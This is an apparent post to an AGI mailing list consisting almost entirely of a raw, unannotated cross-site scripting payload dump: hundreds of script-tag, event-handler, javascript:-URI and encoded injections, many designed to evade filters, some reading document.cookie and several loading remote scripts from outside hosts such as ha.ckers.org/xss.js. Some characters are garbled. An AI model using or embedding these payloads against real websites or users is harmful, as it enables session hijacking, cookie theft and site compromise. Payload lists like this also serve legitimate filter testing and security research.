<script>alert(123);</script><ScRipT>alert("XSS");</ScRipT><script>alert(123)</script><script>alert("hellox
worldss");</script><script>alert(�XSS�)</script><script>alert(�XSS�);</script><script>alert(�XSS�)</script>�><script>alert(�XSS�)</script><script>alert(/XSS�)</script><script>alert(/XSS/)</script></script><script>alert(1)</script>�;
alert(1);�)alert(1);//<ScRiPt>alert(1)</sCriPt><IMG
SRC=jAVasCrIPt:alert(�XSS�)><IMG SRC=�javascript:alert(�XSS�);�><IMG
SRC=javascript:alert("XSS")><IMG SRC=javascript:alert(�XSS�)><img
src=xss onerror=alert(1)><iframe %00
src="	javascript:prompt(1)	"%00><svg><style>{font-family:'<iframe/onload=confirm(1)>'<input/onmouseover="javaSCRIPT:confirm(1)"<sVg><scRipt
%00>alert(1) {Opera}<img/src=`%00`
onerror=this.onerror=confirm(1)<form><isindex
formaction="javascript:confirm(1)"<img src=`%00`

onerror=alert(1)
<script/	
src='https://dl.dropbox.com/u/13018058/js.js' /	></script><ScRipT
5-0*3+9/3=>prompt(1)</ScRipT
giveanswerhere=?<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="><script
/*%00*/>/*%00*/alert(1)/*%00*/</script
/*%00*/"><h1/onmouseover='\u0061lert(1)'>%00<iframe/src="data:text/html,<svg
onload=alert(1)>"><meta content="
 1 
;
JAVASCRIPT: alert(1)" http-equiv="refresh"/><svg><script
xlink:href=data:,window.open('https://www.google.com/')></script<svg><script
x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}<meta
http-equiv="refresh" content="0;url=javascript:confirm(1)"><iframe
src=javascript:alert(document.location)><form><a
href="javascript:\u0061lert(1)">X</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'><img/	 
src=`~` onerror=prompt(1)><form><iframe 	 
src="javascript:alert(1)" 	;><a
href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</ahttp://www.google<script
.com>alert(document.location)</script<a href=[�]"�
onmouseover=prompt(1)//">XYZ</a<img/src=@  onerror =
prompt('1')<style/onload=prompt('XSS')<script
^__^>alert(String.fromCharCode(49))</script ^__^</style  ><script  
:-(>/**/alert(document.location)/**/</script   :-(�</form><input
type="date" onfocus="alert(1)"><form><textarea
onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'><script
/***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script
/***/<iframe srcdoc='<body onload=prompt(1)>'><a
href="javascript:void(0)"
onmouseover=
javascript:alert(1)
>X</a><script
~~~>alert(0%0)</script
~~~><style/onload=<!--	> alert (1)><///style///><span
%2F
onmousemove='alert(1)'>SPAN<img/src='http://i.imgur.com/P8mL8.jpg'
onmouseover=	prompt(1)"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' <blink/
onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}<marquee
onstart='javascript:alert(1)'>^__^<div/style="width:expression(confirm(1))">X</div>
{IE7}<iframe/%00/
src=javaSCRIPT:alert(1)//<form/action=javascript:alert(document.cookie)><input/type='submit'>///*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1)
/*iframe/src*/>//|\\ <script //|\\
src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script
//|\\</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style><a/href="javascript:
javascript:prompt(1)"><input
type="X"></plaintext\></|\><plaintext/onmouseover=prompt(1)</svg>''<svg><script
'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}<a
href="javascript:\u0061le%72t(1)"><button><div
onmouseover='alert(1)'>DIV</div><iframe
style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)"><a
href="jAvAsCrIpT:alert(1)">X</a><embed
src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf";><object
data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf";><var
onmouseover="prompt(1)">On Mouse Over</var><a
href=javascript:alert(document.cookie)>Click
Here</a><img src="/" =_="
title="onerror='prompt(1)'"><%<!--'%><script>alert(1);</script --><script
src="data:text/javascript,alert(1)"></script><iframe/src \/\/onload =
prompt(1)<iframe/onreadystatechange=alert(1)<svg/onload=alert(1)<input
value=<><iframe/src=javascript:confirm(1)<input type="text" value=``
<div/onmouseover='alert(1)'>X</div>http://www.<script>alert(1)</script
.com<iframe
src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe><svg><script
?>alert(1)<iframe
src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe><img
src=`xx:xx`onerror=alert(1)><meta http-equiv="refresh"
content="0;javascript:alert(1)"/><math><a
xlink:href="//jsfiddle.net/t846h/">click<embed
code="http://businessinfo.co.uk/labs/xss/xss.swf"; allowscriptaccess=always><svg
contentScriptType=text/vbs><script>MsgBox+1<a
href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')
worksinIE><script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~
\u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script
U+<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script
a=\u0061 &
/=%2F<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script<object
data=javascript:\u0061le%72t(1)><script>+-+-1-+-+alert(1)</script><body/onload=<!-->
alert(1)><script
itworksinallbrowsers>/*<script* */alert(1)</script<img src
?itworksonchrome?\/onerror =
alert(1)<svg><script>//
confirm(1);</script </svg><svg><script
onlypossibleinopera:-)> alert(1)<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa
aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe<script x>
alert(1) </script 1=2<div/onmouseover='alert(1)'> style="x:"><--`<img/src=`
onerror=alert(1)>
--!><script/src=data:text/javascript,alert(1)></script><div
style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>"><img src=x
onerror=window.open('https://www.google.com/');><form><button
formaction=javascript:alert(1)>CLICKME<math><a
xlink:href="//jsfiddle.net/t846h/">click<object
data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object><iframe
src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe><a
href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click
Me</a><SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49,
41)</SCRIPT>�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�></SCRIPT>�>�><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><IMG
���><SCRIPT>alert(�XSS�)</SCRIPT>�><IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))><IMG SRC=�jav
ascript:alert(�XSS�);�><IMG
SRC=�jav	ascript:alert(�XSS�);�><<SCRIPT>alert(�XSS�);//<</SCRIPT>%253cscript%253ealert(1)%253c/script%253e�><s�%2b�cript>alert(document.cookie)</script>foo<script>alert(1)</script><scr<script>ipt>alert(1)</scr</script>ipt><IMG
SRC=javascript:alert('XSS')><IMG
SRC=javascript:alert('XSS')><IMG
SRC=javascript:alert('XSS')><BODY
BACKGROUND=�javascript:alert(�XSS�)�><BODY ONLOAD=alert(�XSS�)><INPUT
TYPE=�IMAGE� SRC=�javascript:alert(�XSS�);�><IMG
SRC=�javascript:alert(�XSS�)�<iframe src=http://ha.ckers.org/scriptlet.html
<javascript:alert("hellox worldss")<img src="javascript:alert('XSS');"><img
src=javascript:alert("XSS")><"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><META
HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"><IFRAME
SRC="javascript:alert('XSS');"></IFRAME><EMBED
SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml"
AllowScriptAccess="always"></EMBED><SCRIPT a=">"
SRC="http://ha.ckers.org/xss.js";></SCRIPT><SCRIPT a=">" ''
SRC="http://ha.ckers.org/xss.js";></SCRIPT><SCRIPT "a='>'"
SRC="http://ha.ckers.org/xss.js";></SCRIPT><SCRIPT a=">'>"
SRC="http://ha.ckers.org/xss.js";></SCRIPT><SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js";></SCRIPT><<SCRIPT>alert("XSS");//<</SCRIPT><"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search<script>alert("hellox
worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510<script>alert("XSS");</script>&search=10&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search<h1><font
color=blue>hellox worldss</h1><BODY ONLOAD=alert('hellox worldss')><input
onfocus=write(XSS) autofocus><input onblur=write(XSS) autofocus><input
autofocus><body
onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input
autofocus><form><button formaction="javascript:alert(XSS)">lol<!--<img
src="--><img src=x onerror=alert(XSS)//"><![><img src="]><img src=x
onerror=alert(XSS)//"><style><img src="</style><img src=x
onerror=alert(XSS)//"><? foo="><script>alert(1)</script>"><!
foo="><script>alert(1)</script>"></ foo="><script>alert(1)</script>"><?
foo="><x foo='?><script>alert(1)</script>'>"><! foo="[[[Inception]]"><x
foo="]foo><script>alert(1)</script>"><% foo><x
foo="%><script>alert(123)</script>"><div
style="font-family:'foo ;color:red;';">LOLLOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style><script>({0:#0=alert/#0#/#0#(0)})</script><svg
xmlns="http://www.w3.org/2000/svg";>LOL<script>alert(123)</script></svg><SCRIPT>alert(/XSS/.source)</SCRIPT>\\";alert('XSS');//</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT><INPUT
TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"><BODY
BACKGROUND=\"javascript:alert('XSS')\"><BODY
ONLOAD=alert('XSS')><IMG
DYNSRC=\"javascript:alert('XSS')\"><IMG
LOWSRC=\"javascript:alert('XSS')\"><BGSOUND
SRC=\"javascript:alert('XSS');\"><BR
SIZE=\"&{alert('XSS')}\"><LAYER
SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER><LINK
REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"><LINK
REL=\"stylesheet\"
HREF=\"http://ha.ckers.org/xss.css\"><STYLE>@import'http://ha.ckers.org/xss.css';</STYLE><META
HTTP-EQUIV=\"Link\"
Content=\"<http://ha.ckers.org/xss.css>;
REL=stylesheet\"><STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE><XSS
STYLE=\"behavior: url(xss.htc);\"><STYLE>li
{list-style-image:
url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS<IMG
SRC='vbscript:msgbox(\"XSS\")'><IMG
SRC=\"mocha:[code]\"><IMG
SRC=\"livescript:[code]\">�scriptualert(EXSSE)�/scriptu<META
HTTP-EQUIV=\"refresh\"
CONTENT=\"0;url=javascript:alert('XSS');\"><META
HTTP-EQUIV=\"refresh\"
CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"><META
HTTP-EQUIV=\"refresh\" CONTENT=\"0;
URL=http://;URL=javascript:alert('XSS');\"<IFRAME
SRC=\"javascript:alert('XSS');\"></IFRAME><FRAMESET><FRAME
SRC=\"javascript:alert('XSS');\"></FRAMESET><TABLE
BACKGROUND=\"javascript:alert('XSS')\"><TABLE><TD
BACKGROUND=\"javascript:alert('XSS')\"><DIV
STYLE=\"background-image: url(javascript:alert('XSS'))\"><DIV
STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\"><DIV
STYLE=\"background-image: url(javascript:alert('XSS'))\"><DIV
STYLE=\"width:
expression(alert('XSS'));\"><STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE><IMG
STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\"><XSS
STYLE=\"xss:expression(alert('XSS'))\">exp/*<A
STYLE='no\xss:noxss(\"*//*\");xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'><STYLE
TYPE=\"text/javascript\">alert('XSS');</STYLE><STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A
CLASS=XSS></A><STYLE
type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE><!--[if
gte IE
4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--><BASE
HREF=\"javascript:alert('XSS');//\"><OBJECT
TYPE=\"text/x-scriptlet\"
DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT><OBJECT
classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url
value=javascript:alert('XSS')></OBJECT><EMBED
SRC=\"http://ha.ckers.org/xss.swf\"
AllowScriptAccess=\"always\"></EMBED><EMBED
SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\"
AllowScriptAccess=\"always\"></EMBED>a=\"get\";b=\"URL(\\"\";c=\"javascript:\";d=\"alert('XSS');\\")\";eval(a+b+c+d);<HTML
xmlns:xss><?import namespace=\"xss\"
implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML><XML
ID=I><X><C><![CDATA[<IMG
SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]></C></X></xml><SPAN
DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN><XML
ID=\"xss\"><I><B><IMG SRC=\"javas<!--
-->cript:alert('XSS')\"></B></I></XML><SPAN
DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN><XML
SRC=\"xsstest.xml\" ID=I></XML><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML></SPAN><HTML><BODY><?xml:namespace
prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"><?import
namespace=\"t\" implementation=\"#default#time2\"><t:set
attributeName=\"innerHTML\" to=\"XSS<SCRIPT
DEFER>alert("XSS")</SCRIPT>\"></BODY></HTML><SCRIPT
SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT><!--#exec
cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT
SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"--><?
echo('<SCR)';echo('IPT>alert(\"XSS\")</SCRIPT>'); ?><IMG
SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">Redirect
302 /a.jpg http://victimsite.com/admin.asp&deleteuser<META
HTTP-EQUIV=\"Set-Cookie\"
Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\"><HEAD><META
HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\">
</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-<SCRIPT
a=\">\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><SCRIPT
=\">\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><SCRIPT
a=\">\" ''
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><SCRIPT
\"a='>'\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><SCRIPT
a=`>`
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><SCRIPT
a=\">'>\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><A
HREF=\"http://66.102.7.147/\">XSS</A><A
HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A><A
HREF=\"http://1113982867/\">XSS</A><A
HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A><A
HREF=\"http://0102.0146.0007.00000223/\">XSS</A><A
HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A><A
HREF=\"//www.google.com/\">XSS</A><A
HREF=\"//google\">XSS</A><A
HREF=\"http://ha.ckers.org@google\">XSS</A><A
HREF=\"http://google:ha.ckers.org\">XSS</A><A
HREF=\"http://google.com/\">XSS</A><A
HREF=\"http://www.google.com./\">XSS</A><A
HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A><A
HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A><%3C<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\x3c\x3C\u003c\u003C<iframe
src=http://ha.ckers.org/scriptlet.html><IMG
SRC=\"javascript:alert('XSS')\"<SCRIPT
SRC=//ha.ckers.org/.js><SCRIPT
SRC=http://ha.ckers.org/xss.js?<B><<SCRIPT>alert(\"XSS\");//<</SCRIPT><SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><BODY
onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")><SCRIPT/XSS
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><IMG
SRC=\" javascript:alert('XSS');\">perl -e 'print
\"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > outperl -e 'print
\"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out<IMG
SRC=\"jav
ascript:alert('XSS');\"><IMG
SRC=\"jav
ascript:alert('XSS');\"><IMG
SRC=\"jav	ascript:alert('XSS');\"><IMG
SRC=javascript:alert('XSS')><IMG
SRC=javascript:alert('XSS')><IMG
SRC=javascript:alert('XSS')><IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))><IMG
\"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"><IMG
SRC=`javascript:alert(\"RSnake says, 'XSS'\")`><IMG
SRC=javascript:alert("XSS")><IMG
SRC=JaVaScRiPt:alert('XSS')><IMG
SRC=javascript:alert('XSS')><IMG
SRC=\"javascript:alert('XSS');\"><SCRIPT
SRC=http://ha.ckers.org/xss.js></SCRIPT>'';!--\"<XSS>=&{()}';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'';!--"<XSS>=&{()}<SCRIPT
SRC=http://ha.ckers.org/xss.js></SCRIPT><IMG
SRC="javascript:alert('XSS');"><IMG SRC=javascript:alert('XSS')><IMG
SRC=javascrscriptipt:alert('XSS')><IMG SRC=JaVaScRiPt:alert('XSS')><IMG
"""><SCRIPT>alert("XSS")</SCRIPT>"><IMG SRC=" 
javascript:alert('XSS');"><SCRIPT/XSS
SRC="http://ha.ckers.org/xss.js";></SCRIPT><SCRIPT/SRC="http://ha.ckers.org/xss.js";></SCRIPT><<SCRIPT>alert("XSS");//<</SCRIPT><SCRIPT>a=/XSS/alert(a.source)</SCRIPT>\";alert('XSS');//</TITLE><SCRIPT>alert("XSS");</SCRIPT>�script�alert(�XSS�)�/script�<META
HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"><IFRAME
SRC="javascript:alert('XSS');"></IFRAME><FRAMESET><FRAME
SRC="javascript:alert('XSS');"></FRAMESET><TABLE
BACKGROUND="javascript:alert('XSS')"><TABLE><TD
BACKGROUND="javascript:alert('XSS')"><DIV STYLE="background-image:
url(javascript:alert('XSS'))"><DIV
STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"><DIV
STYLE="width:
expression(alert('XSS'));"><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><IMG
STYLE="xss:expr/*XSS*/ession(alert('XSS'))"><XSS
STYLE="xss:expression(alert('XSS'))">exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'><EMBED
SRC="http://ha.ckers.org/xss.swf";
AllowScriptAccess="always"></EMBED>a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);<SCRIPT
SRC="http://ha.ckers.org/xss.jpg";></SCRIPT><HTML><BODY><?xml:namespace
prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t"
implementation="#default#time2"><t:set attributeName="innerHTML"
to="XSS<SCRIPT
DEFER>alert("XSS")</SCRIPT>"></BODY></HTML><SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js";></SCRIPT><form id="test" /><button
form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION<form><button
formaction="javascript:alert(123)">crosssitespt<frameset
onload=alert(123)><!--<img src="--><img src=x onerror=alert(123)//"><style><img
src="</style><img src=x onerror=alert(123)//"><object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="><embed
src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="><embed
src="javascript:alert(1)"><? foo="><script>alert(1)</script>"><!
foo="><script>alert(1)</script>"></
foo="><script>alert(1)</script>"><script>({0:#0=alert/#0#/#0#(123)})</script><script>ReferenceError.prototype.__defineGetter__('name',
function(){alert(123)}),x</script><script>Object.__noSuchMethod__ =
Function,[{}][0].constructor._('alert(1)')()</script><script
src="#">{alert(1)}</script>;1<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script><svg
xmlns="#"><script>alert(1)</script></svg><svg onload="javascript:alert(123)"
xmlns="#"></svg><iframe xmlns="#"
src="javascript:alert(1)"></iframe>+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-%253cscript%253ealert(document.cookie)%253c/script%253e�><s�%2b�cript>alert(document.cookie)</script>�><ScRiPt>alert(document.cookie)</script>�><<script>alert(document.cookie);//<</script>foo<script>alert(document.cookie)</script><scr<script>ipt>alert(document.cookie)</scr</script>ipt>%22/%3E%3CBODY%20onload=�document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)�%3E�;
alert(document.cookie); var foo=�foo\�;
alert(document.cookie);//�;</script><script
>alert(document.cookie)</script><img src=asdf
onerror=alert(document.cookie)><BODY
ONLOAD=alert(�XSS�)><script>alert(1)</script>"><script>alert(String.fromCharCode(66,
108, 65, 99, 75, 73, 99, 101))</script><video src=1 onerror=alert(1)><audio
src=1 onerror=alert(1)>
------------------------------------------
Artificial General Intelligence List: AGI
Permalink:
https://agi.topicbox.com/groups/agi/T1655a7a13b5657c3-Mff671af4b371cc49c2e6d347
Delivery options: https://agi.topicbox.com/groups/agi/subscription
![http://ha.ckers.org/xss.jpg"](http://ha.ckers.org/xss.jpg"){kind=link}